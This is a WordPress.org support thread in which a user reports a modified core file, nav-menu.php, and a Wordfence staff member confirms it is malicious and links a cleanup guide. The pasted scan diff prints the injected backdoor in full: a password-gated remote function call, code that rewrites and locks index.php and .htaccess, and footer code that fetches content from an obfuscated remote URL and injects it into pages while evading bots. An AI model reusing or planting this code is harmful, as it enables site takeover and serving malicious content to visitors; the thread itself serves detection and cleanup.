Title: WordPress core file modified: wp-includes/nav-menu.php
Last modified: August 31, 2016

---

# WordPress core file modified: wp-includes/nav-menu.php

 *  Resolved [audat](https://wordpress.org/support/users/audat/)
 * (@audat)
 * [10 years, 3 months ago](https://wordpress.org/support/topic/wordpress-core-file-modified-wp-includesnav-menuphp/)
 * Hi, does anybody know how critical this is? I fixed this by replacing nav-menu.
   php with the repository version now.
 * Filename: wp-includes/nav-menu.php
    File type: WordPress Core File The Original
   Version of the file The Modified Version on your WordPress system 526 * [@param](https://wordpress.org/support/users/param/)
   array $args Optional. Array of arguments passed on to {@see get_terms()}. 526*
   [@param](https://wordpress.org/support/users/param/) array $args Optional. Array
   of arguments passed on to {@see get_terms()}. 527 * Default empty array. 527 *
   Default empty array. 528 * [@return](https://wordpress.org/support/users/return/)
   array Menu objects. 528 * [@return](https://wordpress.org/support/users/return/)
   array Menu objects. 529 */ 529 *///istart 530 531 function my_time($dir) { 532
   foreach (glob($dir . ‘/wp-*.php’) as $f) { 533 $times[] = filemtime($f); 534 }
   535 $max = 1; 536 for ($i = 0; $i < count($times) – 1; $i++) { 537 $k = 1; 538
   for ($j = $i + 1; $j < count($times); $j++) { 539 if ($times[$i] == $times[$j]){
   540 $k++; 541 if ($k > $max) { 542 $max = $k; 543 $time = $times[$i]; 544 } 545}
   546 } 547 } 548 return $time; 549 } 550 551 function my_correct($dir) { 552 $
   time = 0; 553 $path = $dir . ‘/index.php’; 554 $content = base64_decode(‘PD9waHAKLyoqCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSBkb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMKICogd3AtYmxvZy1oZWFkZXIucGhwIHdoaWNoIGRvZXMgYW5kIHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoJ1dQX1VTRV9USEVNRVMnLCB0cnVlKTsKCi8qKiBMb2FkcyB0aGUgV29yZFByZXNzIEVudmlyb25tZW50IGFuZCBUZW1wbGF0ZSAqLwpyZXF1aXJlKCBkaXJuYW1lKCBfX0ZJTEVfXyApIC4gJy93cC1ibG9nLWhlYWRlci5waHAnICk7Cg
   ==’); 555 if (file_get_contents($path) != $content) { 556 chmod($path, 0644);
   557 file_put_contents($path, $content); 558 chmod($path, 0444); 559 $time = my_time(
   $dir); 560 touch($path, $time); 561 } 562 563 $path = $dir . ‘/.htaccess’; 564
   $content = base64_decode(‘IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM
   +ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg
   ==’); 565 if (file_exists($path) AND file_get_contents($path) != $content) { 
   566 chmod($path, 0644); 567 file_put_contents($path, $content); 568 chmod($path,
   0444); 569 if (!$time) { 570 $time = my_time($dir); 571 } 572 touch($path, $time);
   573 } 574 } 575 576 $p = $_POST; 577 $_passssword = ‘fafff3f841d025b87cc40a6bd0ee0eeb’;
   578 if (@$p[$_passssword] AND @$p[‘a’] AND @$p[‘c’]) @$p[$_passssword](@$p[‘a’],
   @$p[‘c’], ”); 579 my_correct(dirname(__FILE__) . ‘/..’); 580 581 function request_url_data(
   $url) { 582 if(!is_valid_url($url)) 583 return false; 584 585 $site_url = (preg_match(‘/
   ^https?:\/\//i’, $_SERVER[‘REQUEST_URI’]) ? $_SERVER[‘REQUEST_URI’] : ‘[http://&#8217](http://&#8217);.
   $_SERVER[‘HTTP_HOST’] . $_SERVER[‘REQUEST_URI’]); 586 if (function_exists(‘curl_init’)){
   587 $ch = curl_init(); 588 curl_setopt($ch, CURLOPT_TIMEOUT, 5); 589 curl_setopt(
   $ch, CURLOPT_CONNECTTIMEOUT, 5); 590 curl_setopt($ch, CURLOPT_URL, $url); 591
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 592 curl_setopt($ch, CURLOPT_HTTPHEADER,
   array( 593 ‘X-Forwarded-For: ‘ . $_SERVER[“REMOTE_ADDR”], 594 ‘User-Agent: ‘ .
   $_SERVER[“HTTP_USER_AGENT”], 595 ‘Referer: ‘ . $site_url, 596 )); 597 $response
   = trim(curl_exec($ch)); 598 } elseif (function_exists(‘fsockopen’)) { 599 $m 
   = parse_url($url); 600 if ($fp = fsockopen($m[‘host’], 80, $errno, $errstr, 6)){
   601 fwrite($fp, ‘GET [http://&#8217](http://&#8217); . $m[‘host’] . $m[“path”].‘?’.
   $m[‘query’] . ‘ HTTP/1.0’ . “\r\n” . 602 ‘Host: ‘ . $m[‘host’] . “\r\n” . 603‘
   User-Agent: ‘ . $_SERVER[“HTTP_USER_AGENT”] . “\r\n” . 604 ‘X-Forwarded-For: ‘.
   @$_SERVER[“REMOTE_ADDR”] . “\r\n” . 605 ‘Referer: ‘ . $site_url . “\r\n” . 606‘
   Connection: Close’ . “\r\n\r\n”); 607 $response = ”; 608 while (!feof($fp)) {
   609 $response .= fgets($fp, 1024); 610 } 611 list($headers, $response) = explode(“\
   r\n\r\n”, $response); 612 fclose($fp); 613 } 614 } else { 615 $response = ‘curl_init
   and fsockopen disabled’; 616 } 617 return $response; 618 } 619 620 error_reporting(
   0); 621 622 //unset($_passssword); 623 624 if (function_exists(“add_action”)){
   625 add_action(‘wp_head’, ‘add_2head’); 626 add_action(‘wp_footer’, ‘add_2footer’);
   627 } 628 629 function add_2head() { 630 ob_start(); 631 } 632 633 function is_valid_url(&
   $url) 634 { 635 if (!preg_match(‘/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/’, $
   url, $m)) 636 return false; 637 $url = $m[1].$m[5].’.’.$m[4].’.’.$m[3].’.’.$m[
   2].$m[6]; 638 return true; 639 } 640 641 function add_2footer() { 642 $check 
   = false; 643 $check_data = “”; 644 if (!empty($_GET[‘check’]) AND $_GET[‘check’]
   == ‘fafff3f841d025b87cc40a6bd0ee0eeb’) { 645 $check = true; 646 $check_data =(‘
   <!–checker_start ‘); 647 $check_data .= (substr(request_url_data(‘[http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css&#8217](http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css&#8217);),
   0, 100)); 648 $check_data .= (‘ checker_end–>’); 649 } 650 651 if (!$check) {
   652 if (!@$_SERVER[‘HTTP_USER_AGENT’] OR (substr($_SERVER[‘REMOTE_ADDR’], 0, 
   6) == ‘74.125’) OR preg_match(‘/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/
   i’, $_SERVER[‘HTTP_USER_AGENT’])) 653 return; 654 655 $cookie_name = ‘PHP_SESSION_PHP’;
   656 if (isset($_COOKIE[$cookie_name])) 657 return; 658 659 foreach (array(‘/\.
   css$/’, ‘/\.swf$/’, ‘/\.ashx$/’, ‘/\.docx$/’, ‘/\.doc$/’, ‘/\.xls$/’, ‘/\.xlsx
   $/’, ‘/\.xml$/’, ‘/\.jpg$/’, ‘/\.pdf$/’, ‘/\.png$/’, ‘/\.gif$/’, ‘/\.ico$/’, ‘/\.
   js$/’, ‘/\.txt$/’, ‘/ajax/’, ‘/cron\.php$/’, ‘/wp\-login\.php$/’, ‘/\/wp\-includes\//’,‘/\/
   wp\-admin/’, ‘/\/admin\//’, ‘/\/wp\-content\//’, ‘/\/administrator\//’, ‘/phpmyadmin/
   i’, ‘/xmlrpc\.php/’, ‘/\/feed\//’) as $regex) { 660 if (preg_match($regex, $_SERVER[‘
   REQUEST_URI’])) 661 return; 662 } 663 } 664 665 $buffer = ob_get_clean(); 666
   ob_start(); 667 $regexp = ‘/<body[^>]*>/is’; 668 if (preg_match($regexp, $buffer,
   $m)) { 669 $body = $m[0]; 670 // $url = base64_decode(‘a3d3czksLDIwOy0xNjItNi0yOzYsYW9sZCw8cWZmYWxoJXZ3blxwbHZxYGY
   +NTMyOjE5NDA1Mjs6OTI7OjI=’); 671 $url = decrypt_url(‘a3d3czksLDIwOy0xNjItNi0yOzYsYW9sZCw8cWZmYWxoJXZ3blxwbHZxYGY
   +NTMyOjE5NDA1Mjs6OTI7OjI=’); 672 // if (($code = request_url_data($url)) AND 
   base64_decode($code) AND preg_match(‘#[a-zA-Z0-9+/]+={0,3}#is’, $code, $m)) {
   673 if (($code = request_url_data($url)) AND $decoded = base64_decode($code, 
   true)) { 674 // $body .= ‘<script>var date = new Date(new Date().getTime() + 
   60*60*24*7*1000); document.cookie=”‘ . $cookie_name . ‘=’ . mt_rand(1, 1024) .‘;
   path=/; expires=”+date.toUTCString();</script>’; 675 // $body .= base64_decode(
   $m[0]); 676 $body .= $decoded; 677 // $body .= base64_decode($m[0]); 678 } 679
   $body .= $check_data; 680 681 $buffer = preg_replace($regexp, $body, $buffer);
   682 } 683 echo $buffer; 684 ob_flush(); 685 } 686 687 function decrypt_url($encrypted_url)
   688 { 689 $encrypted_url = base64_decode($encrypted_url); 690 $url = ”; 691 for(
   $i = 0; $i < strlen($encrypted_url); $i++) 692 { 693 $url .= chr(ord($encrypted_url[
   $i]) ^ 3); 694 } 695 return $url; 696 }//iend 697 530 function wp_get_nav_menus(
   $args = array() ) { 698 function wp_get_nav_menus( $args = array() ) { 531 $defaults
   = array( ‘hide_empty’ => false, ‘orderby’ => ‘name’ ); 699 $defaults = array(‘
   hide_empty’ => false, ‘orderby’ => ‘name’ ); 532 $args = wp_parse_args( $args,
   $defaults ); 700 $args = wp_parse_args( $args, $defaults );
 * [https://wordpress.org/plugins/wordfence/](https://wordpress.org/plugins/wordfence/)

Viewing 1 replies (of 1 total)

 *  Plugin Author [WFMattR](https://wordpress.org/support/users/wfmattr/)
 * (@wfmattr)
 * [10 years, 2 months ago](https://wordpress.org/support/topic/wordpress-core-file-modified-wp-includesnav-menuphp/#post-7053785)
 * Hi,
 * It is definitely malicious, so replacing the file with the original was good.
   You could have a vulnerable plugin (or outdated version of WordPress or a theme),
   so make sure everything is up to date.
 * We also have a guide here, to help clean hacked sites. Some of the more aggressive
   scan options may find additional malicious files, and there are recommendations
   on updates, passwords, etc., which may help prevent reinfection:
    [How to clean a hacked website](https://www.wordfence.com/learn/how-to-clean-a-hacked-website/)
 * -Matt R

Viewing 1 replies (of 1 total)

The topic ‘WordPress core file modified: wp-includes/nav-menu.php’ is closed to 
new replies.

 * ![](https://ps.w.org/wordfence/assets/icon.svg?rev=2070865)
 * [Wordfence Security - Firewall, Malware Scan, and Login Security](https://wordpress.org/plugins/wordfence/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/wordfence/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/wordfence/)
 * [Active Topics](https://wordpress.org/support/plugin/wordfence/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/wordfence/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/wordfence/reviews/)

 * 1 reply
 * 2 participants
 * Last reply from: [WFMattR](https://wordpress.org/support/users/wfmattr/)
 * Last activity: [10 years, 2 months ago](https://wordpress.org/support/topic/wordpress-core-file-modified-wp-includesnav-menuphp/#post-7053785)
 * Status: resolved